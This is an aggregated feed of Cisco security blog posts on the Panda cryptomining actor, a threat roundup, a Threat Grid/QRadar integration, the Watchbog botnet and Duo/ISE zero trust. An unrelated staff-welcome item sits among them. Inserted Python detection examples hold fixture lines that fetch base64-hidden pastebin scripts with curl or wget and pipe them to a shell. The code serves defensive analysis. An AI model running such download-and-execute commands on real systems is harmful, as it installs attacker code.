By Talos Group (Christopher Evans and David Liebenberg).
Executive summary
A new threat actor named “Panda” has generated thousands of dollars' worth of the Monero cryptocurrency through the use of remote access tools (RATs) and illicit cryptocurrency-mining malware. This is far from the most sophisticated actor we have ever seen, but it has been one of the most active attackers in Cisco Talos threat trap data. Panda’s willingness to persistently exploit vulnerable web applications worldwide, their tooling for moving laterally through networks, and their use of RATs mean that organizations worldwide are at risk of having their system resources misused for mining, or worse, such as the exfiltration of valuable information.
Panda has shown time and again that they will update their infrastructure and exploits on the fly as security researchers publish indicators of compromise and proofs of concept. Our threat traps show that Panda uses exploits previously released by the Shadow Brokers — a group infamous for publishing information from the National Security Agency — and Mimikatz, an open-source credential-dumping program.
Talos first became aware of Panda in the summer of 2018, when they were engaged in the successful and widespread “MassMiner” campaign. Shortly thereafter, we linked Panda to another widespread illicit mining campaign that used a different set of command and control (C2) servers. Since then, this actor has updated its infrastructure, exploits and payloads. We believe Panda is a legitimate threat capable of spreading cryptocurrency miners that consume valuable computing resources and slow down networks and systems. Talos confirmed that organizations in the banking, healthcare, transportation, telecommunications and IT services industries were affected in these campaigns.

Source:: Cisco Security Notice


Barely arrived with us and already passed his first certification course. That's one way to start, isn't it? Congratulations on passing the innovaphone Technician Connect.

To the delight of his colleagues, Efrem plays on the console in Team X-BOX. In his free time he likes to try out all kinds of restaurants together with his girlfriend, and he keeps himself up to date on PC systems privately as well.

Glad to have you on board, Efrem.

By Talos Group
Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between Sept. 6 and Sept. 13. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, it summarizes the threats we’ve observed by highlighting key behavioral characteristics and indicators of compromise, and discusses how our customers are automatically protected from these threats.
As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats are subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.
Reference:
TRU09132019 – This is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.
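The caveat that a single IOC hit is not a verdict is worth making concrete. The following is an added example, not code from the Talos roundup or from its JSON IOC file: a small Python script that loads an IOC document of the same general shape (hash, domain and IP lists), scans log lines for those indicators, and only flags a host when more than one independent indicator type corroborates. Every hash, domain, address and log line is a constructed placeholder, and the log field names (sha256=, name=, dst=) are assumed for the example.

```python
"""Score hosts against an IOC list, treating a lone indicator as weak evidence.

Added example: the IOC document and the log lines are constructed; none of the
hashes, domains or addresses are real indicators.
"""
import json
import re
from collections import defaultdict

# Constructed IOC document in the spirit of a per-roundup JSON IOC file.
IOC_JSON = """{
  "cluster": "example-cluster",
  "sha256": [
    "0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
    "fedcba9876543210fedcba9876543210fedcba9876543210fedcba9876543210"
  ],
  "domains": ["update.example-bad.test"],
  "ips": ["198.51.100.23"]
}"""

# Constructed syslog-like lines: host-a trips three indicator types,
# host-b trips one, host-c trips none. Field names are assumed.
LOGS = """\
2019-09-10T12:00:01Z host-a edr: file_created path=/tmp/svc sha256=0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
2019-09-10T12:00:05Z host-a dns: query name=update.example-bad.test
2019-09-10T12:00:09Z host-a net: connect dst=198.51.100.23 port=443
2019-09-10T13:10:00Z host-b edr: file_created path=/opt/tool sha256=fedcba9876543210fedcba9876543210fedcba9876543210fedcba9876543210
2019-09-10T14:00:00Z host-c dns: query name=www.example.com
"""

# One extractor per indicator type; each pulls the candidate value out of a line.
FIELD_PATTERNS = {
    "sha256": re.compile(r"\bsha256=([0-9a-f]{64})\b"),
    "domains": re.compile(r"\bname=([A-Za-z0-9.-]+)"),
    "ips": re.compile(r"\bdst=(\d{1,3}(?:\.\d{1,3}){3})\b"),
}


def load_iocs(text):
    """Parse the IOC document into lowercase sets keyed by indicator type."""
    doc = json.loads(text)
    return {kind: {v.lower() for v in doc.get(kind, [])} for kind in FIELD_PATTERNS}


def match_line(line, iocs):
    """Return (kind, value) pairs for every listed indicator the line contains."""
    hits = []
    for kind, pattern in FIELD_PATTERNS.items():
        for value in pattern.findall(line):
            if value.lower() in iocs[kind]:
                hits.append((kind, value.lower()))
    return hits


def verdict(kinds):
    """A single indicator type alone is weak evidence; two or more corroborate."""
    if not kinds:
        return "clean"
    return "weak" if len(kinds) == 1 else "corroborated"


def score_hosts(log_text, iocs):
    """Group hits per host (second whitespace token) and attach a verdict."""
    per_host = defaultdict(lambda: {"hits": [], "kinds": set()})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        entry = per_host[parts[1]]
        for kind, value in match_line(line, iocs):
            entry["hits"].append((kind, value))
            entry["kinds"].add(kind)
    return {
        host: {"hits": e["hits"], "kinds": sorted(e["kinds"]), "verdict": verdict(e["kinds"])}
        for host, e in per_host.items()
    }


if __name__ == "__main__":
    for host, result in score_hosts(LOGS, load_iocs(IOC_JSON)).items():
        print(host, result["verdict"], result["kinds"])
```

The "weak" verdict for host-b is the point: one matching hash on one host should open a hunt for the other indicators in the cluster, not close the case either way.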

Source:: Cisco Security Notice

By Jessica Bair
Download the app for faster, more effective threat detection and response
Two years ago, Cisco and IBM Security announced a strategic alliance to address the growing threat of cybercrime. This collaboration builds on each organization’s strengths and complementary offerings to provide integrated solutions, managed services and shared threat intelligence to drive more effective security for our joint customers. We continue to develop new applications for IBM’s QRadar security analytics platform and the Cisco Threat Grid app for QRadar with DSM was just released.
Cisco’s Threat Grid App integrates with IBM’s QRadar SIEM, enabling analysts to quickly identify, understand and respond to threats through the QRadar dashboard. Downloadable via the IBM Security App Exchange, the app combines advanced sandboxing, malware analysis and threat intelligence in one unified solution.
Threat Grid + QRadar lets analysts quickly determine the behavior of possibly malicious files that have been submitted to Threat Grid, and drill down from QRadar into the Threat Grid unified malware analysis and threat intelligence platform for deeper insight. This integration expedites the threat investigation process, with a dashboard view into the highest-priority threats delivered directly through QRadar rather than requiring a pivot across disparate tools and interfaces.
Detailed results from Threat Grid’s sandbox analysis can be aggregated by QRadar to determine whether potential threats within the organization are malicious or benign. Malware samples are assigned a Threat Score and displayed by hash value and by the user who submitted the sample.

This information displayed on the Threat Grid dashboard can be used to quickly resolve threats detected by QRadar. This results in improved efficiency and optimization for security analysts, by quickly identifying the top priorities for threat investigation.
With the QRadar DSM capabilities, you can see the analysis results over time.

Also, under Log Activity, you can right-click a suspicious IP address to see instant contextual threat intelligence from Threat Grid.

Threat Grid also integrates with IBM Resilient Incident Response Platform (IRP) for automated response and X-Force Exchange for even greater threat intelligence enrichment. For example, analysts in the IRP can look up Indicators of Compromise (IoC) with Cisco Threat Grid’s threat intelligence, or detonate suspected malware with its sandbox technology. This empowers security teams to gain valuable incident data in the moment of response.
These technology integrations between Cisco Security and IBM Security enable a more extensive security architecture for greater speed and efficiency in identifying, investigating, and remediating threats. Together, we deliver the intelligence, automation and analytics required to provide the data and insights that today’s security practitioners require.
Please visit the Cisco and IBM page for the latest information about our partnership, and the Cisco Marketplace for details of the IBM integrations.

Note: Version 1.0.0 of the app has a coding error that limits its compatibility to the Threat Grid US Cloud. A fix adding support for the Threat Grid European cloud and the Threat Grid appliance is in validation testing with IBM.

Source:: Cisco Security Notice

By Talos Group (Luke DuCharme and Paul Lee).
What Happened?
Cisco Incident Response (CSIRS) recently responded to an incident involving the Watchbog cryptomining botnet. The attackers were able to exploit CVE-2018-1000861 to gain a foothold and install the Watchbog malware on the affected systems.
This Linux-based malware relied heavily on Pastebin for command and control (C2) and operated openly. CSIRS gained an accurate understanding of the attacker’s intentions and abilities on a customer’s network by analyzing the various Pastebins. As the investigation progressed, CSIRS identified and de-obfuscated multiple pastes using artifacts left on compromised hosts.
There were some attempts at obfuscation, such as base64 encoding URLs and Pastebins, but the attack was still relatively simple to uncover – this attacker did not practice particularly strong operational security.
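The base64-encoded URL trick described above lends itself to a mechanical first pass over host artifacts. The following is an added example, not code from the CSIRS investigation: it scans constructed crontab and startup-script contents for base64 tokens, strictly decodes each candidate, keeps only those that decode to URLs, and pulls out the referenced paste identifiers. The artifact contents, the `base64 -d` pattern in them and the paste IDs EXAMPLE01/EXAMPLE02 are all constructed for the example.

```python
"""Recover base64-hidden second-stage URLs from persistence artifacts.

Added example: ARTIFACTS is constructed to resemble what a Pastebin-driven
dropper leaves behind; the paste IDs and file contents are placeholders.
"""
import base64
import binascii
import re

# Constructed host artifacts. Each pulls a URL out of a base64 blob at run time.
ARTIFACTS = {
    "/var/spool/cron/crontabs/root": (
        "*/5 * * * * (curl -fsSL $(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0VYQU1QTEUwMQ== "
        "| base64 -d) || wget -q -O- $(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0VYQU1QTEUwMQ== "
        "| base64 -d)) | bash\n"
    ),
    "/etc/rc.local": (
        "#!/bin/sh\n"
        "TOKEN=Zm9vYmFy\n"  # valid base64 ('foobar') but not a URL: must be ignored
        "U=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0VYQU1QTEUwMg== | base64 -d)\n"
        "curl -fsSL \"$U\" | sh\n"
    ),
}

# Candidate base64 runs, clear-text URLs, and pastebin raw URLs (real URL layout,
# placeholder IDs).
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{8,}={0,2}")
URL = re.compile(r"https?://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+")
PASTE_RAW = re.compile(r"https?://pastebin\.com/raw/([A-Za-z0-9]+)")


def decode_token(token):
    """Strictly decode one base64 candidate; return ASCII text or None."""
    if len(token) % 4:
        return None
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        return raw.decode("ascii")
    except UnicodeDecodeError:
        return None


def extract_urls(text):
    """URLs present in clear text plus URLs hidden inside base64 tokens."""
    found = set(URL.findall(text))
    for token in B64_TOKEN.findall(text):
        decoded = decode_token(token)
        if decoded:
            found.update(URL.findall(decoded))
    return found


def extract_from_artifacts(artifacts):
    """Map each artifact path to the sorted list of URLs recovered from it."""
    return {path: sorted(extract_urls(body)) for path, body in artifacts.items()}


def paste_ids(urls):
    """Paste identifiers referenced by any pastebin raw URL in the set."""
    ids = set()
    for url in urls:
        match = PASTE_RAW.match(url)
        if match:
            ids.add(match.group(1))
    return sorted(ids)


if __name__ == "__main__":
    recovered = extract_from_artifacts(ARTIFACTS)
    for path, urls in recovered.items():
        print(path, urls)
    print("paste IDs:", paste_ids(set().union(*recovered.values())))
```

Strict decoding (validate=True plus a length check) matters more than it looks: a loose decoder will happily turn random identifier-like tokens into garbage bytes, and filtering the result through a URL pattern is what keeps the output to things worth pivoting on. Each recovered paste ID then becomes its own artifact to fetch and decode in turn, which is how multiple layered pastes get unwound.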
The attackers behind Watchbog claimed to be providing a service by identifying security vulnerabilities and aiding the organization by exploiting said weaknesses before any “real” hackers could do so. During the investigation, Cisco IR found signs of hosts becoming a part of a separate botnet around the time of the Watchbog activity. This raises serious doubts about the “positive” intentions of this adversary. Below is a message left on a compromised system by the adversary:

Source:: Cisco Security Notice

By Amanda Rogerson
Cybersecurity: the final frontier. These are the trials and tribulations that network admins face on an ongoing basis. Sometimes it feels like network admins are Starfleet captains navigating unknown galaxies as the infrastructure of organizations becomes more complex. With a complicated mix of cloud apps, on-prem systems, BYOD, IoT, and more, gone are the days of purely corporate-owned assets.
This means it is more challenging to trust all the devices on your network. Let’s face it, the perimeter has shifted: users and devices have become the primary entry points for accessing the network and business applications, and more often than not they rely on weak, legacy, password-based access controls. There must be a better way to boldly go where every admin has gone before and control both application and network access across your campus, data center, and cloud!
On today’s modern networks, administrators require solutions that provide deep visibility into users, devices, and applications both on and off the corporate network.
There is no need to set your phasers to stun for non-compliant users or devices. A “zero trust for the workforce” security model answers these challenges by treating every access attempt as if it were an invading alien species arriving from an unknown galaxy, or in this case an untrusted network.
This model focuses on authenticating users and checking the security posture of devices before granting access to applications. By combining the power of Duo Security with Cisco Identity Services Engine (ISE), you have a recipe for successfully implementing modern access controls that are simple yet astonishingly effective at addressing some core use cases around these challenges, and more appetizing than a Klingon’s Rokeg Blood Pie.
A Recipe to Simplify Visibility and Device Compliance
Decentralization of device management can leave administrators wondering how users are accessing resources. Determining the posture of devices connecting to resources is critical because outdated software often has vulnerabilities that are routinely exploited. Without current endpoint security protections, people can unwittingly turn their devices into a menace on the network, worse than a Tribble invasion. Two simple ingredients provide a delicious approach for strong access controls that is easy to replicate anywhere in the environment.
Cisco Identity Services Engine (ISE) makes it easy to gain visibility and control over who and what is on your corporate network, consistently across wireless, wired, and VPN connections. As users and devices connect to the network, ISE confirms identities against its user repository and authenticates those users before it grants and controls access based on who and what requested network access. Duo Security complements this visibility by providing device insights for any device connecting to applications, including devices that are not connected to the corporate environment.
With multi-factor authentication and adaptive access controls, Duo provides the ability to authenticate the user connecting to the resource and verify the access attempt. Through granular access policies at the application or group membership level, administrators can establish controls to grant or block access attempts by identity or device and based on contextual factors such as user location, network address ranges, biometrics, device security and more.
For devices connected to the corporate network, ISE together with the Cisco AnyConnect Secure Mobility Client checks the security posture of devices that connect to your network. Duo’s Trusted Endpoints augments these controls and lets you issue device certificates that are checked at login, for greater insight into and control over your BYOD environment, while limiting access by any personal devices that don’t meet your security requirements. With ISE and Duo, you benefit from the simplified, secure controls needed to grant appropriate access while protecting your organization from the risks of unauthorized people and devices.
Don’t let the Borg assimilate you into an outdated approach to security. Take the helm and join Duo and Cisco on September 24th to learn more recipes for how combining the power of Duo Security with Cisco ISE can help your organization adopt a zero-trust approach to modern, simple and effective secure access. Full speed ahead, live long and prosper.

Source:: Cisco Security Notice